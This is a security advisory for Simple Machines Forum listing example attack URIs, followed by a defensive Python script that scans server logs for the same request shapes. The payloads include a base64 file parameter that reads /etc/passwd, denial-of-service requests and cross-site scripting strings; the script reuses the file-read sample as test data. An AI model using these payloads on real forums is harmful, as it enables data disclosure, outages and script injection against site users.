Simple Machines Forum Multiple Security Vulnerabilities
An attacker can use a browser to exploit these issues. To exploit the cross-site scripting and cross-site request-forgery vulnerabilities, the attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

Information disclosure:
http://www.example.com/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==

Denial of service:
GET /.xml.html;sa=news;limit=999;type=rss HTTP/1.1

Denial of service (cookie):
Cookie: GLOBALS

Cross-site scripting:
http://www.example.com/index.php?action=admin;area=languages;sa=add;[token]
PoC: "><xss>

http://www.example.com/index.php?action=admin;area=theme;sa=settings;th=2;[token]
PoC: http://urlreal"><script>alert(1);</script>
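For defenders reviewing web server logs, the following added example (not part of the original advisory, and not Simple Machines Forum code) flags the three request shapes listed above: an error-log `file` value that decodes to a path outside the forum directory, an oversized feed `limit`, and a cookie named `GLOBALS`. The function names, the forum root path and the limit threshold are assumptions of this example.

```python
import base64
from urllib.parse import unquote

MAX_FEED_LIMIT = 100  # assumed ceiling for a legitimate feed request


def smf_params(target):
    """Split a request target whose pairs are separated by ';' or '&'."""
    query = target.split("?", 1)[-1].replace("&", ";")
    pairs = (part.partition("=") for part in query.split(";"))
    return {key: unquote(value) for key, _, value in pairs}


def decode_file_param(value):
    """Return the decoded 'file' value, or None if it is not base64 text."""
    core = value.rstrip("=")  # tolerate over-padded input
    try:
        raw = base64.b64decode(core + "=" * (-len(core) % 4), validate=True)
        return raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_request(target, cookie_header="", forum_root="/var/www/smf/"):
    """Return a list of findings for one logged request (root is assumed)."""
    findings, params = [], smf_params(target)
    if params.get("sa") == "errorlog" and "file" in params:
        path = decode_file_param(params["file"])
        if path is None or not path.startswith(forum_root) or ".." in path:
            findings.append(f"errorlog file outside forum root: {path!r}")
    limit = params.get("limit", "")
    if params.get("type") == "rss" and limit.isdigit() and int(limit) > MAX_FEED_LIMIT:
        findings.append(f"oversized feed limit: {limit}")
    names = [c.split("=", 1)[0].strip() for c in cookie_header.split(";")]
    if "GLOBALS" in names:
        findings.append("cookie named GLOBALS")
    return findings


# Constructed sample input, modelled on the request shapes listed above.
SAMPLES = [
    ("/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==", ""),
    ("/.xml.html;sa=news;limit=999;type=rss", ""),
    ("/index.php?action=profile", "GLOBALS=1; PHPSESSID=abc"),
]

if __name__ == "__main__":
    for target, cookie in SAMPLES:
        print(target, inspect_request(target, cookie))
```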